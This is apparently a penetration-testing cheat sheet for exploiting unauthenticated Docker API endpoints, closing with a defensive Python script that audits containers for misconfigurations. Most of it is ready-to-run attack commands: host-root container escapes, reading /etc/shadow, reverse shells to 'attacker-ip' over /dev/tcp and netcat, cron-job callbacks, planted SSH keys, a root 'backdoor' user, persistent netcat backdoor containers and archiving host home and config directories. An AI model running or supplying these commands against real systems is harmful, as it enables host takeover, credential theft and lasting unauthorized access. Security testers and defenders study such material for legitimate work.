# Docker

**`Default Ports: 2375 (HTTP), 2376 (HTTPS)`**

**Docker** is a containerization platform that allows developers to package applications and their dependencies into isolated containers. The Docker API provides remote management capabilities, enabling administration of Docker hosts over the network. When exposed without proper authentication, it can lead to complete host compromise.

### Connect <a href="#connect" id="connect"></a>

#### Using Docker Client <a href="#using-docker-client" id="using-docker-client"></a>

The Docker CLI can connect to remote Docker daemons for management and exploitation:

**Set Persistent Connection (Unencrypted)**

```
export DOCKER_HOST="tcp://target.com:2375"
docker ps
```

**Set Persistent Connection with TLS**

```
export DOCKER_HOST="tcp://target.com:2376"
export DOCKER_TLS_VERIFY=1
# The client certificate, key and CA are read from $DOCKER_CERT_PATH (default: ~/.docker)
docker --tlsverify ps
```

**Execute One-Time Commands**

```
# Unencrypted
docker -H tcp://target.com:2375 ps

# With TLS
docker -H tcp://target.com:2376 --tlsverify ps
```

#### Using cURL <a href="#using-curl" id="using-curl"></a>

cURL allows direct interaction with the Docker REST API for enumeration and exploitation:

**Get Docker Version Information**

```
curl http://target.com:2375/version
```

**List All Containers**

```
curl http://target.com:2375/containers/json
```

**List Available Images**

```
curl http://target.com:2375/images/json
```

**Retrieve System Information**

```
curl http://target.com:2375/info
```

#### Using Docker API Directly <a href="#using-docker-api-directly" id="using-docker-api-directly"></a>

```
# Python example
import docker

client = docker.DockerClient(base_url='tcp://target.com:2375')
print(client.containers.list())
print(client.images.list())
```

### Recon <a href="#recon" id="recon"></a>

#### Service Detection with Nmap <a href="#service-detection-with-nmap" id="service-detection-with-nmap"></a>

Use `Nmap` to check if the Docker API is exposed and determine if it requires authentication.

**Basic Port and Version Detection**

```
nmap -p 2375,2376 -sV target.com
```

**Docker Information Scripts**

```
nmap -p 2375 --script docker-version,docker-info target.com
```

#### Banner Grabbing <a href="#banner-grabbing" id="banner-grabbing"></a>

Identify the Docker version and gather initial information about the Docker daemon using various tools.

**Using Netcat**

```
nc -vn target.com 2375
```

**Using cURL for Version Information**

```
curl -s http://target.com:2375/version
```

**Get Detailed Information with JSON Parsing**

```
curl -s http://target.com:2375/version | jq .
curl -s http://target.com:2375/info | jq .
```

#### Check Authentication <a href="#check-authentication" id="check-authentication"></a>

Determine if the Docker API requires authentication and test different connection methods.

**Test Unencrypted Authentication**

```
curl -s http://target.com:2375/containers/json

# Container list returned: no authentication
# Error returned: authentication required
# Connection refused: service not exposed or firewalled
```

**Test TLS Connection**

```
openssl s_client -connect target.com:2376
```

### Enumeration <a href="#enumeration" id="enumeration"></a>

#### Container Enumeration <a href="#container-enumeration" id="container-enumeration"></a>

Listing containers reveals running applications, their configurations, and potential attack targets.

**List Running Containers**

```
docker -H tcp://target.com:2375 ps
```

**List All Containers**

```
docker -H tcp://target.com:2375 ps -a
```

**Get Container Details**

```
docker -H tcp://target.com:2375 inspect <container_id>
```

**Using API Directly**

```
curl http://target.com:2375/containers/json?all=1
```

**Check Container Processes**

```
docker -H tcp://target.com:2375 top <container_id>
```

#### Image Enumeration <a href="#image-enumeration" id="image-enumeration"></a>

Docker images can contain sensitive information, credentials, and application secrets.

**List Available Images**

```
docker -H tcp://target.com:2375 images
```

**Get Image Details**

```
docker -H tcp://target.com:2375 inspect <image_id>
```

**View Image History**

```
docker -H tcp://target.com:2375 history <image_id>
```

**Using API for Images**

```
curl http://target.com:2375/images/json
```

#### Network Enumeration <a href="#network-enumeration" id="network-enumeration"></a>

Discover Docker networks and their configurations to understand container communication.

**List Docker Networks**

```
docker -H tcp://target.com:2375 network ls
```

**Inspect Network Details**

```
docker -H tcp://target.com:2375 network inspect bridge
```

**Using API for Networks**

```
curl http://target.com:2375/networks
```

#### Volume Enumeration <a href="#volume-enumeration" id="volume-enumeration"></a>

Identify Docker volumes that may contain persistent data or sensitive information.

**List Docker Volumes**

```
docker -H tcp://target.com:2375 volume ls
```

**Inspect Volume Details**

```
docker -H tcp://target.com:2375 volume inspect <volume_name>
```

**Using API for Volumes**

```
curl http://target.com:2375/volumes
```

#### System Information <a href="#system-information" id="system-information"></a>

Gather comprehensive information about the Docker daemon and host system.

**Get Docker Information**

```
docker -H tcp://target.com:2375 info
```

**Get Docker Version**

```
docker -H tcp://target.com:2375 version
```

**Check Disk Usage**

```
docker -H tcp://target.com:2375 system df
```

**Using API for System Info**

```
curl http://target.com:2375/info | jq .
curl http://target.com:2375/version | jq .
```

### Attack Vectors <a href="#attack-vectors" id="attack-vectors"></a>

#### Container Escape via Privileged Container <a href="#container-escape-via-privileged-container" id="container-escape-via-privileged-container"></a>

Privileged containers bypass security restrictions and allow direct access to the host system. This is one of the most effective methods for escaping container isolation and gaining root access to the underlying host.

**Creating Privileged Container**

```
docker -H tcp://target.com:2375 run -it --privileged \
  --pid=host --net=host --ipc=host \
  -v /:/host ubuntu /bin/bash
```

**Accessing Host System**

```
# Inside container, access host filesystem
chroot /host /bin/bash

# Now you have root on the host system
whoami  # root
cat /etc/shadow
```

#### Container Escape via Volume Mount <a href="#container-escape-via-volume-mount" id="container-escape-via-volume-mount"></a>

Volume mounting allows containers to access host filesystems, potentially leading to host compromise when sensitive directories are mounted.

**Mount Host Root Filesystem**

```
docker -H tcp://target.com:2375 run -it \
  -v /:/hostfs ubuntu /bin/bash
```

**Access Host Files**

```
cd /hostfs
cat /hostfs/etc/shadow
```

**Establish Persistence**

```
# Write SSH key for persistence
mkdir -p /hostfs/root/.ssh
echo "ssh-rsa AAAA..." > /hostfs/root/.ssh/authorized_keys
chmod 600 /hostfs/root/.ssh/authorized_keys
```

#### Reverse Shell via New Container <a href="#reverse-shell-via-new-container" id="reverse-shell-via-new-container"></a>

Create new containers with reverse shell capabilities to establish remote access to the Docker host.

**Create Container with Bash Reverse Shell**

```
docker -H tcp://target.com:2375 run -d \
  ubuntu /bin/bash -c \
  "bash -i >& /dev/tcp/attacker-ip/4444 0>&1"
```

**Create Container with Netcat Reverse Shell**

```
docker -H tcp://target.com:2375 run -d \
  ubuntu nc attacker-ip 4444 -e /bin/bash
```

**Mount Host and Execute Reverse Shell**

```
docker -H tcp://target.com:2375 run -d \
  -v /:/hostfs ubuntu \
  /bin/bash -c "chroot /hostfs bash -i >& /dev/tcp/attacker-ip/4444 0>&1"
```

#### Execute Commands in Existing Container <a href="#execute-commands-in-existing-container" id="execute-commands-in-existing-container"></a>

Execute commands within running containers to gain access and perform reconnaissance.

**Execute Single Command**

```
docker -H tcp://target.com:2375 exec <container_id> whoami
```

**Get Interactive Shell**

```
docker -H tcp://target.com:2375 exec -it <container_id> /bin/bash
```

**Execute as Root**

```
docker -H tcp://target.com:2375 exec -u root -it <container_id> /bin/bash
```

**Using API for Command Execution**

```
curl -X POST -H "Content-Type: application/json" \
  http://target.com:2375/containers/<container_id>/exec \
  -d '{"AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"Cmd":["/bin/bash"],"DetachKeys":"ctrl-p,ctrl-q","Privileged":false,"Tty":true}'
```

#### Image Backdooring <a href="#image-backdooring" id="image-backdooring"></a>

Create malicious Docker images with backdoors to establish persistent access or compromise other systems.

**Pull Legitimate Image**

```
docker -H tcp://target.com:2375 pull ubuntu
```

**Create Malicious Dockerfile**

```
cat > Dockerfile <<EOF
FROM ubuntu
RUN apt-get update && apt-get install -y netcat
CMD ["nc", "-lvp", "4444", "-e", "/bin/bash"]
EOF
```

**Build and Deploy Backdoored Image**

```
# Build backdoored image
docker build -t ubuntu:backdoor .

# Save and upload
docker save ubuntu:backdoor > backdoor.tar
curl -X POST -H "Content-Type: application/x-tar" \
  --data-binary @backdoor.tar \
  http://target.com:2375/images/load
```

#### Docker Socket Abuse <a href="#docker-socket-abuse" id="docker-socket-abuse"></a>

Exploit containers that have the Docker socket mounted, allowing control of the Docker daemon from within a container.

**Check for Docker Socket**

```
ls -la /var/run/docker.sock
```

**Control Docker from Container**

```
docker -H unix:///var/run/docker.sock ps
```

**Escape to Host**

```
docker -H unix:///var/run/docker.sock run -it \
  -v /:/hostfs ubuntu chroot /hostfs /bin/bash
```

#### Secrets Extraction <a href="#secrets-extraction" id="secrets-extraction"></a>

Extract sensitive information including secrets, credentials, and configuration data from Docker containers and images.

**List Docker Swarm Secrets**

```
docker -H tcp://target.com:2375 secret ls
```

**Inspect Secret Details**

```
docker -H tcp://target.com:2375 secret inspect <secret_id>
```

**Search for Sensitive Files**

```
docker -H tcp://target.com:2375 exec <container_id> \
  find / -name "*.key" -o -name "*credential*" -o -name "*.pem" 2>/dev/null
```

**Check Environment Variables**

```
docker -H tcp://target.com:2375 exec <container_id> env
```

**Inspect Container Configuration**

```
docker -H tcp://target.com:2375 inspect <container_id> | grep -i "env\|secret\|password"
```

### Post-Exploitation <a href="#post-exploitation" id="post-exploitation"></a>

#### Host Takeover <a href="#host-takeover" id="host-takeover"></a>

Gain complete control over the Docker host system through various persistence and privilege escalation methods.

**Create Privileged Container**

```
docker -H tcp://target.com:2375 run -it --rm --privileged \
  --pid=host --net=host -v /:/host alpine \
  chroot /host /bin/bash
```

**Establish Cron Job Persistence**

```
docker -H tcp://target.com:2375 run -v /etc:/hostfs/etc alpine \
  sh -c 'echo "* * * * * root bash -i >& /dev/tcp/attacker-ip/4444 0>&1" >> /hostfs/etc/crontab'
```

**Add SSH Key for Access**

```
docker -H tcp://target.com:2375 run -v /root:/hostfs/root alpine \
  sh -c 'mkdir -p /hostfs/root/.ssh && echo "ssh-rsa AAAA..." >> /hostfs/root/.ssh/authorized_keys'
```

**Create Backdoor User**

```
docker -H tcp://target.com:2375 run -v /etc:/hostfs/etc alpine \
  sh -c 'echo "backdoor:x:0:0::/root:/bin/bash" >> /hostfs/etc/passwd && echo "backdoor:password_hash" >> /hostfs/etc/shadow'
```

#### Container Persistence <a href="#container-persistence" id="container-persistence"></a>

Create persistent backdoor containers that maintain access even after system restarts.

**Create Persistent Backdoor Container**

```
docker -H tcp://target.com:2375 run -d --name backdoor \
  --restart always \
  -p 4444:4444 \
  ubuntu nc -lvp 4444 -e /bin/bash
```

**Verify Container Status**

```
docker -H tcp://target.com:2375 ps | grep backdoor
```

#### Data Exfiltration <a href="#data-exfiltration" id="data-exfiltration"></a>

Extract sensitive data from containers and host systems for analysis or exfiltration.

**Copy Files from Container**

```
docker -H tcp://target.com:2375 cp <container_id>:/etc/passwd /tmp/passwd
```

**Export Container Filesystem**

```
docker -H tcp://target.com:2375 export <container_id> > container.tar
tar -xf container.tar
```

**Backup Host Data**

```
docker -H tcp://target.com:2375 run -v /:/hostfs alpine \
  tar czf /tmp/backup.tar.gz /hostfs/etc /hostfs/root /hostfs/home
```

**Download Archive**

```
docker -H tcp://target.com:2375 cp <container_id>:/tmp/backup.tar.gz .
```

#### Registry Access <a href="#registry-access" id="registry-access"></a>

Access private Docker registries to extract images and search for sensitive information.

**Pull Images from Private Registry**

```
docker -H tcp://target.com:2375 pull registry.company.com/app:latest
```

**Extract Image Contents**

```
docker -H tcp://target.com:2375 save registry.company.com/app:latest > app.tar
tar -xf app.tar
```

**Search for Credentials**

```
grep -r "password\|secret\|key" .
```

#### Network Pivoting <a href="#network-pivoting" id="network-pivoting"></a>

Use Docker containers to pivot into internal networks and access additional systems.

**Create Host Network Container**

```
docker -H tcp://target.com:2375 run -it --net=host \
  alpine /bin/sh
```

**Install Network Tools**

```
apk add nmap
```

**Scan Internal Networks**

```
nmap -sn 192.168.0.0/24
nmap -p- 192.168.0.100
```

**Setup SOCKS Proxy**

```
docker -H tcp://target.com:2375 run -d \
  -p 1080:1080 \
  serjs/go-socks5-proxy
```

**Use Proxy for Pivoting**

```
# Edit /etc/proxychains.conf
# socks5 target.com 1080
proxychains nmap -sT 192.168.0.0/24
```

#### Container Modification <a href="#container-modification" id="container-modification"></a>

Modify existing containers and images to create persistent backdoors or extract sensitive information.

**Commit Container as New Image**

```
docker -H tcp://target.com:2375 commit <container_id> backdoored:latest
```

**Export and Analyze Image**

```
docker -H tcp://target.com:2375 save backdoored:latest > backdoored.tar
```

**Modify Image Layers**

```
# Extract tar
tar -xf backdoored.tar
# Modify layer contents
# Repackage
tar -cf modified.tar *
# Load back
docker -H tcp://target.com:2375 load < modified.tar
```

### Common Docker Commands <a href="#common-docker-commands" id="common-docker-commands"></a>

| Command          | Description              | Usage                                                 |
| ---------------- | ------------------------ | ----------------------------------------------------- |
| `docker ps`      | List running containers  | `docker -H tcp://target:2375 ps`                      |
| `docker ps -a`   | List all containers      | `docker -H tcp://target:2375 ps -a`                   |
| `docker images`  | List images              | `docker -H tcp://target:2375 images`                  |
| `docker exec`    | Execute in container     | `docker -H tcp://target:2375 exec -it <id> /bin/bash` |
| `docker run`     | Create and run container | `docker -H tcp://target:2375 run -it ubuntu`          |
| `docker inspect` | Get details              | `docker -H tcp://target:2375 inspect <id>`            |
| `docker logs`    | View logs                | `docker -H tcp://target:2375 logs <id>`               |
| `docker cp`      | Copy files               | `docker -H tcp://target:2375 cp <id>:/file .`         |

### Docker API Endpoints <a href="#docker-api-endpoints" id="docker-api-endpoints"></a>

| Endpoint                 | Method | Description            |
| ------------------------ | ------ | ---------------------- |
| `/version`               | GET    | Get Docker version     |
| `/info`                  | GET    | Get system information |
| `/containers/json`       | GET    | List containers        |
| `/containers/create`     | POST   | Create container       |
| `/containers/<id>/start` | POST   | Start container        |
| `/containers/<id>/exec`  | POST   | Execute command        |
| `/images/json`           | GET    | List images            |
| `/images/create`         | POST   | Pull/create image      |
| `/networks`              | GET    | List networks          |
| `/volumes`               | GET    | List volumes           |

### Useful Tools <a href="#useful-tools" id="useful-tools"></a>

| Tool            | Description            | Primary Use Case         |
| --------------- | ---------------------- | ------------------------ |
| Docker CLI      | Official Docker client | Container management     |
| docker-py       | Python Docker library  | Automation and scripting |
| docker-compose  | Multi-container tool   | Orchestration            |
| docker-bench    | Security audit tool    | Configuration assessment |
| dive            | Image layer explorer   | Image analysis           |
| trivy           | Vulnerability scanner  | Image security scanning  |
| docker-explorer | Forensics tool         | Container investigation  |

### Security Misconfigurations to Test <a href="#security-misconfigurations-to-test" id="security-misconfigurations-to-test"></a>

* ❌ Docker API exposed without authentication
* ❌ Using unencrypted port 2375
* ❌ Privileged containers running
* ❌ Host filesystem mounted in containers
* ❌ Docker socket mounted in containers
* ❌ Containers running as root
* ❌ No resource limits on containers
* ❌ Exposed internal ports
* ❌ Using `:latest` tag for production
* ❌ No vulnerability scanning on images
* ❌ Secrets stored in images or environment variables
* ❌ No network segmentation between containers
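To turn this checklist into a check you can run against your own hosts, here is an added Python example (not from the original notes) that evaluates `docker inspect` records, as returned by `docker -H ... inspect <id>` or by docker-py's `Container.attrs`, against the items above and the escape conditions described under Attack Vectors (privileged mode, host root mounted, Docker socket mounted). The two records are constructed samples trimmed to the keys the checks read; real output carries many more fields.

```python
import json

# Constructed sample in the shape of `docker inspect <id>` output (also what
# docker-py exposes as Container.attrs); real records carry many more keys.
SAMPLE_INSPECT = json.loads("""[
 {"Name": "/web-hardened",
  "Config": {"Image": "registry.example/app:1.4.2", "User": "1000:1000"},
  "HostConfig": {"Privileged": false, "PidMode": "", "IpcMode": "private",
                 "NetworkMode": "bridge", "Memory": 268435456, "CapAdd": null,
                 "Binds": ["appdata:/data:ro"]},
  "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/appdata/_data", "Destination": "/data"}]},
 {"Name": "/debug-box",
  "Config": {"Image": "ubuntu", "User": ""},
  "HostConfig": {"Privileged": true, "PidMode": "host", "IpcMode": "host",
                 "NetworkMode": "host", "Memory": 0, "CapAdd": ["SYS_ADMIN"],
                 "Binds": ["/:/host", "/var/run/docker.sock:/var/run/docker.sock"]},
  "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/host"},
             {"Type": "bind", "Source": "/var/run/docker.sock", "Destination": "/var/run/docker.sock"}]}
]""")

# Added capabilities that effectively hand over the host, and host paths worth flagging.
RISKY_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "NET_ADMIN", "DAC_READ_SEARCH"}
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/home", "/proc", "/sys", "/boot", "/var/lib/docker")

def audit_container(info):
    """Return the misconfigurations found in one inspect record as short tags."""
    cfg, hc = info.get("Config", {}), info.get("HostConfig", {})
    findings = []
    if hc.get("Privileged"):
        findings.append("privileged")
    for ns in ("PidMode", "IpcMode", "NetworkMode"):   # --pid/--ipc/--net=host
        if hc.get(ns) == "host":
            findings.append(f"{ns.lower()}=host")
    for cap in hc.get("CapAdd") or []:
        if cap.upper() in RISKY_CAPS:
            findings.append(f"cap_add={cap}")
    # Host paths enter via Binds ("src:dst[:opts]") and bind-type Mounts; volume
    # mounts live under /var/lib/docker and are not host exposure, so skip them.
    sources = [b.split(":", 1)[0] for b in hc.get("Binds") or []]
    sources += [m["Source"] for m in info.get("Mounts") or [] if m.get("Type") == "bind"]
    for src in dict.fromkeys(sources):                # de-duplicate, keep order
        if src == "/":
            findings.append("host-root-mounted")
        elif src.endswith("docker.sock"):
            findings.append("docker-socket-mounted")
        elif src.startswith(SENSITIVE_HOST_PATHS):
            findings.append(f"sensitive-host-path={src}")
    # Config.User already reflects the image's USER directive; empty means root.
    if cfg.get("User", "").split(":")[0] in ("", "0", "root"):
        findings.append("runs-as-root")
    if not hc.get("Memory"):                          # 0 = no memory limit
        findings.append("no-memory-limit")
    ref = cfg.get("Image", "").rsplit("/", 1)[-1]     # strip registry/namespace
    if ("@" not in ref and ":" not in ref) or ref.endswith(":latest"):
        findings.append("image-tag-latest")
    return findings

def audit_all(records):
    """Map container name -> findings for every record of a `docker inspect` array."""
    return {r.get("Name", "?").lstrip("/"): audit_container(r) for r in records}
```

Feed it the JSON from `docker inspect $(docker ps -q)` to review every running container on a host at once.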

### Container Escape Checks <a href="#container-escape-checks" id="container-escape-checks"></a>

```
# Check if running in container
ls -la /.dockerenv
cat /proc/1/cgroup | grep docker

# Check for privileged mode
ip link add dummy0 type dummy 2>/dev/null && echo "Privileged" || echo "Not Privileged"

# Check capabilities
capsh --print

# Check mounted filesystems
mount | grep -i docker

# Check for Docker socket
ls -la /var/run/docker.sock

# Check for host proc
ls -la /proc/sys/kernel

# Check kernel version vs host
uname -r
```
